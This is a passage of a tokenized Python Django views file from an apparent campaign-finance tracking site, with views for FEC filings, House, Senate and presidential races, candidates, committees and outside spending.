, cache_control <EOL> STATE_LIST = [ { '<STR_LIT:name>' : x [ <NUM_LIT:1> ] , '<STR_LIT>' : x [ <NUM_LIT:0> ] } for x in US_STATES ] <EOL> try : <EOL> PAGINATE_BY = settings . REST_FRAMEWORK [ '<STR_LIT>' ] <EOL> except : <EOL> print "<STR_LIT>" <EOL> PAGINATE_BY = <NUM_LIT:100> <EOL> try : <EOL> BULK_EXPORT_KEY = settings . BULK_EXPORT_KEY <EOL> except AttributeError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> LONG_CACHE_TIME = settings . LONG_CACHE_TIME <EOL> SHORT_CACHE_TIME = settings . SHORT_CACHE_TIME <EOL> except AttributeError : <EOL> print "<STR_LIT>" <EOL> LONG_CACHE_TIME = <NUM_LIT> <EOL> SHORT_CACHE_TIME = <NUM_LIT:30> <EOL> try : <EOL> CURRENT_CYCLE = settings . CURRENT_CYCLE <EOL> except : <EOL> print "<STR_LIT>" <EOL> CURRENT_CYCLE = '<STR_LIT>' <EOL> def newbase ( request ) : <EOL> return render_to_response ( '<STR_LIT>' , { } , context_instance = RequestContext ( request ) ) <EOL> def home_page ( request ) : <EOL> return redirect ( '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def senate ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> title = "<STR_LIT>" <EOL> explanatory_text = "<STR_LIT>" <EOL> districts = District . objects . filter ( office = '<STR_LIT:S>' , cycle = cycle ) <EOL> legislators = Candidate_Overlay . objects . filter ( office = '<STR_LIT:S>' , cycle = cycle ) . filter ( Q ( cash_on_hand__gte = <NUM_LIT:1000> ) | Q ( is_incumbent = True ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> districts = District . objects . filter ( office = '<STR_LIT:H>' , cycle = cycle ) <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : legislators , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def senate_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def house ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> title = "<STR_LIT>" <EOL> explanatory_text = "<STR_LIT>" <EOL> legislators = Candidate_Overlay . objects . filter ( office = '<STR_LIT:H>' , cycle = cycle ) . filter ( Q ( cash_on_hand__gte = <NUM_LIT:1000> ) | Q ( is_incumbent = True ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> districts = District . objects . filter ( office = '<STR_LIT:H>' , cycle = cycle ) <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : legislators , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def house_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def races ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> title = "<STR_LIT>" % ( cycle ) <EOL> explanatory_text = "<STR_LIT>" <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> districts = District . objects . filter ( cycle = cycle ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def races_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> def race_id_redirect ( request , race_id ) : <EOL> race = get_object_or_404 ( District , pk = race_id ) <EOL> return redirect ( race . get_absolute_url ( ) ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def house_race ( request , cycle , state , district ) : <EOL> race = get_object_or_404 ( District , cycle = cycle , state = state , office_district = district , office = '<STR_LIT:H>' ) <EOL> title = race . race_name ( ) <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . filter ( Q ( total_receipts__gte = <NUM_LIT:1000> ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate__in = candidates , total_ind_exp__gte = <NUM_LIT> ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidate_list = [ x . get ( '<STR_LIT>' ) for x in candidates . values ( '<STR_LIT>' ) ] <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> recent_ies = SkedE . objects . filter ( candidate_id_checked__in = candidate_list , expenditure_amount__gte = <NUM_LIT:1000> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> committees = Committee_Overlay . objects . filter ( curated_candidate__in = candidates ) <EOL> committee_ids = [ x . get ( '<STR_LIT>' ) for x in committees . values ( '<STR_LIT>' ) ] <EOL> recent_filings = new_filing . objects . filter ( fec_id__in = committee_ids , is_superceded = False ) . exclude ( coverage_to_date__isnull = True ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> cycle_values = District . objects . filter ( state = state , office_district = district , office = '<STR_LIT:H>' ) . exclude ( cycle = cycle ) <EOL> cycle_list = [ race ] + list ( cycle_values ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : race , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : recent_filings , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def presidential_race ( request ) : <EOL> race = get_object_or_404 ( District , cycle = CURRENT_CYCLE , office = '<STR_LIT:P>' ) <EOL> title = "<STR_LIT>" <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . filter ( Q ( total_receipts__gte = <NUM_LIT> ) | Q ( total_expenditures__gte = <NUM_LIT> ) ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate__in = candidates , total_ind_exp__gte = <NUM_LIT> ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidate_list = [ x . get ( '<STR_LIT>' ) for x in candidates . values ( '<STR_LIT>' ) ] <EOL> cycle_endpoints = get_cycle_endpoints ( int ( CURRENT_CYCLE ) ) <EOL> recent_ies = SkedE . objects . filter ( candidate_id_checked__in = candidate_list , expenditure_amount__gte = <NUM_LIT> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> committees = Committee_Overlay . objects . filter ( curated_candidate__in = candidates ) <EOL> committee_ids = [ x . get ( '<STR_LIT>' ) for x in committees . values ( '<STR_LIT>' ) ] <EOL> recent_filings = new_filing . objects . filter ( fec_id__in = committee_ids , is_superceded = False ) . exclude ( coverage_to_date__isnull = True ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> cycle_list = list_2016_only <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : race , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : recent_filings , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def senate_race ( request , cycle , state , term_class ) : <EOL> race = get_object_or_404 ( District , cycle = cycle , state = state , term_class = term_class , office = '<STR_LIT:S>' ) <EOL> title = race . race_name ( ) <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . filter ( Q ( total_receipts__gte = <NUM_LIT:1000> ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate__in = candidates , total_ind_exp__gte = <NUM_LIT> ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidate_list = [ x . get ( '<STR_LIT>' ) for x in candidates . values ( '<STR_LIT>' ) ] <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> recent_ies = SkedE . objects . filter ( candidate_id_checked__in = candidate_list , expenditure_amount__gte = <NUM_LIT:1000> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> cycle_values = District . objects . filter ( state = state , term_class = term_class , office = '<STR_LIT:S>' ) . exclude ( cycle = cycle ) <EOL> cycle_list = [ race ] + list ( cycle_values ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : race , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def newest_filings ( request ) : <EOL> candidates = Candidate_Overlay . objects . filter ( office__in = [ '<STR_LIT:H>' , '<STR_LIT:P>' ] , cycle = CURRENT_CYCLE ) . order_by ( '<STR_LIT:name>' ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def pacs ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def pacs_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_control ( no_cache = True ) <EOL> def outside_spenders ( request , cycle ) : <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> explanatory_text = "<STR_LIT>" % cycle <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT:title>' : "<STR_LIT>" % cycle , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : cycle_list , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def outside_spenders_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_control ( no_cache = True ) <EOL> def dynamic_ies ( request ) : <EOL> districts = District . objects . filter ( outside_spending__gt = <NUM_LIT:1000> ) . order_by ( '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidates = Candidate_Overlay . objects . filter ( total_expenditures__gt = <NUM_LIT:1> ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) <EOL> outside_spenders = Committee_Overlay . objects . filter ( total_indy_expenditures__gte = <NUM_LIT:1000> ) . order_by ( '<STR_LIT:name>' ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT>' : outside_spenders , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def new_committees ( request ) : <EOL> today = datetime . datetime . today ( ) <EOL> month_ago = today - datetime . timedelta ( days = <NUM_LIT:30> ) <EOL> committees = f1filer . objects . filter ( receipt_dt__gte = month_ago ) . order_by ( '<STR_LIT>' ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : committees , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def render_blank_page ( title , explanatory_text , request ) : <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def downloads_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> def downloads ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> title = "<STR_LIT>" <EOL> update_time = get_update_time ( BULK_EXPORT_KEY ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : cycle , <EOL> '<STR_LIT>' : cycle_list , <EOL> '<STR_LIT>' : update_time , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def about ( request ) : <EOL> title = "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def outside_spending ( request ) : <EOL> title = "<STR_LIT>" <EOL> explanatory_text = "<STR_LIT>" <EOL> ies = SkedE . objects . filter ( superceded_by_amendment = False , expenditure_amount__gte = <NUM_LIT> , expenditure_date_formatted__gte = datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : ies , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filing ( request , filing_num ) : <EOL> filing = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> committee = None <EOL> title = "<STR_LIT>" % ( filing . committee_name , filing_num ) <EOL> if not filing . committee_name : <EOL> try : <EOL> committee = Committee_Overlay . objects . get ( fec_id = filing . fec_id , cycle = filing . cycle ) <EOL> title = "<STR_LIT>" % ( committee . get_absolute_url ( ) , committee . name , filing_num ) <EOL> except : <EOL> pass <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filing , <EOL> '<STR_LIT>' : committee , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filings_skeda ( request , filing_num ) : <EOL> filing_data = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> title = "<STR_LIT>" % ( filing_data . get_committee_url ( ) , filing_data . committee_name , filing_data . get_absolute_url ( ) , filing_num ) <EOL> filings = None <EOL> too_many_to_display = False <EOL> if filing_data . lines_present : <EOL> lines_present = filing_data . lines_present . get ( '<STR_LIT:A>' ) <EOL> if int ( lines_present ) <= <NUM_LIT:1000> : <EOL> filings = SkedA . objects . filter ( filing_number = filing_num ) . order_by ( '<STR_LIT>' ) <EOL> else : <EOL> too_many_to_display = True <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filings , <EOL> '<STR_LIT>' : too_many_to_display , <EOL> '<STR_LIT>' : filing_data , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filings_skedb ( request , filing_num ) : <EOL> filing_data = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> title = "<STR_LIT>" % ( filing_data . get_committee_url ( ) , filing_data . committee_name , filing_data . get_absolute_url ( ) , filing_num ) <EOL> filings = None <EOL> too_many_to_display = False <EOL> if filing_data . lines_present : <EOL> lines_present = filing_data . lines_present . get ( '<STR_LIT:B>' ) <EOL> if int ( lines_present ) <= <NUM_LIT:1000> : <EOL> filings = SkedB . objects . filter ( filing_number = filing_num ) . order_by ( '<STR_LIT>' ) <EOL> else : <EOL> too_many_to_display = True <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filings , <EOL> '<STR_LIT>' : too_many_to_display , <EOL> '<STR_LIT>' : filing_data , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filings_skede ( request , filing_num ) : <EOL> filing_data = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> title = "<STR_LIT>" % ( filing_data . get_committee_url ( ) , filing_data . committee_name , filing_data . get_absolute_url ( ) , filing_num ) <EOL> filings = None <EOL> too_many_to_display = False <EOL> if filing_data . lines_present : <EOL> lines_present = filing_data . lines_present . get ( '<STR_LIT:E>' ) <EOL> if int ( lines_present ) <= <NUM_LIT:1000> : <EOL> filings = SkedE . objects . filter ( filing_number = filing_num ) . order_by ( '<STR_LIT>' ) <EOL> else : <EOL> too_many_to_display = True <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filings , <EOL> '<STR_LIT>' : too_many_to_display , <EOL> '<STR_LIT>' : filing_data , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def committee ( request , slug , committee_id ) : <EOL> return redirect ( "<STR_LIT>" % ( slug , committee_id ) ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( <NUM_LIT:1> ) <EOL> def committee_cycle ( request , cycle , committee_id ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> committee_overlay = get_object_or_404 ( Committee_Overlay , fec_id = committee_id , cycle = int ( cycle ) ) <EOL> title = committee_overlay . name + "<STR_LIT>" % ( cycle ) <EOL> report_list = Committee_Time_Summary . objects . filter ( com_id = committee_id , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_from_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . order_by ( '<STR_LIT>' ) <EOL> end_of_coverage_date = committee_overlay . cash_on_hand_date <EOL> recent_report_list = None <EOL> if end_of_coverage_date : <EOL> relevant_date = max ( end_of_coverage_date , cycle_endpoints [ '<STR_LIT:start>' ] ) <EOL> recent_report_list = new_filing . objects . filter ( fec_id = committee_id , coverage_from_date__gte = relevant_date , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_f5_quarterly = True ) . exclude ( is_superceded = True ) <EOL> else : <EOL> recent_report_list = new_filing . objects . filter ( fec_id = committee_id , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_f5_quarterly = True ) . exclude ( is_superceded = True ) <EOL> independent_spending = Pac_Candidate . objects . filter ( committee = committee_overlay , total_ind_exp__gte = <NUM_LIT> , cycle = cycle ) . select_related ( '<STR_LIT>' ) <EOL> recent_ies = None <EOL> if committee_overlay . total_indy_expenditures > <NUM_LIT> : <EOL> recent_ies = SkedE . objects . filter ( filer_committee_id_number = committee_id , expenditure_amount__gte = <NUM_LIT> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:10> ] <EOL> cycle_values = Committee_Overlay . objects . filter ( fec_id = committee_id ) . exclude ( cycle = cycle ) <EOL> cycle_list = [ committee_overlay ] + list ( cycle_values ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : report_list , <EOL> '<STR_LIT>' : recent_report_list , <EOL> '<STR_LIT>' : committee_overlay , <EOL> '<STR_LIT>' : independent_spending , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : cycle_list , <EOL> '<STR_LIT>' : cycle , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def candidate ( request , slug , candidate_id ) : <EOL> return redirect ( "<STR_LIT>" % ( slug , candidate_id ) ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def candidate_cycle ( request , slug , candidate_id , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> cycles = Candidate_Overlay . objects . filter ( fec_id = candidate_id ) <EOL> candidate_overlay = None <EOL> try : <EOL> candidate_overlay = cycles . get ( cycle = cycle ) <EOL> except Candidate_Overlay . DoesNotExist : <EOL> if len ( cycles ) > <NUM_LIT:0> : <EOL> candidate_overlay = cycles . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> return redirect ( "<STR_LIT>" % ( candidate_overlay . cycle , slug , candidate_id ) ) <EOL> else : <EOL> raise Http404 <EOL> other_cycles = cycles . exclude ( cycle = cycle ) <EOL> cycle_list = [ candidate_overlay ] + list ( other_cycles ) <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> title = "<STR_LIT>" % ( candidate_overlay . name , candidate_overlay . party , cycle ) <EOL> authorized_committee_list = Authorized_Candidate_Committees . objects . filter ( candidate_id = candidate_id , cycle = cycle ) <EOL> committee_list = [ x . get ( '<STR_LIT>' ) for x in authorized_committee_list . values ( '<STR_LIT>' ) ] <EOL> report_list = Committee_Time_Summary . objects . filter ( com_id__in = committee_list , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_through_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . order_by ( '<STR_LIT>' ) <EOL> end_of_coverage_date = None <EOL> recent_report_list = None <EOL> if report_list : <EOL> end_of_coverage_date = report_list [ <NUM_LIT:0> ] . coverage_through_date <EOL> recent_report_total = <NUM_LIT:0> <EOL> if end_of_coverage_date : <EOL> recent_report_list = new_filing . objects . filter ( fec_id__in = committee_list , coverage_from_date__gte = end_of_coverage_date , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_superceded = True ) <EOL> if recent_report_list : <EOL> recent_report_total = recent_report_list . aggregate ( spending_total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> else : <EOL> recent_report_list = new_filing . objects . filter ( fec_id__in = committee_list , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_superceded = True ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate = candidate_overlay , cycle = cycle , total_ind_exp__gte = <NUM_LIT:1000> ) . select_related ( '<STR_LIT>' ) <EOL> recent_ies = None <EOL> if outside_spenders : <EOL> recent_ies = SkedE . objects . filter ( candidate_checked = candidate_overlay , expenditure_amount__gte = <NUM_LIT> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:10> ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : report_list , <EOL> '<STR_LIT>' : candidate_overlay , <EOL> '<STR_LIT>' : authorized_committee_list , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_report_list , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : recent_report_total , <EOL> '<STR_LIT>' : cycle_list , <EOL> '<STR_LIT>' : cycle <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def subscribe ( request ) : <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def committee_search_html ( request ) : <EOL> params = request . GET <EOL> committees = None <EOL> try : <EOL> committee_name_fragment = params [ '<STR_LIT:name>' ] <EOL> if len ( committee_name_fragment ) > <NUM_LIT:3> : <EOL> print committee_name_fragment <EOL> committees = Committee_Overlay . objects . filter ( Q ( name__icontains = committee_name_fragment ) | Q ( curated_candidate__name__icontains = committee_name_fragment ) ) . select_related ( '<STR_LIT>' ) <EOL> else : <EOL> committees = None <EOL> except KeyError : <EOL> committees = None <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : committees , <EOL> } <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def top_races ( request , week_number ) : <EOL> week_start = get_week_start ( int ( week_number ) ) <EOL> week_start_formatted = week_start . strftime ( '<STR_LIT>' ) <EOL> week_end = get_week_end ( int ( week_number ) ) <EOL> week_end_formatted = week_end . strftime ( 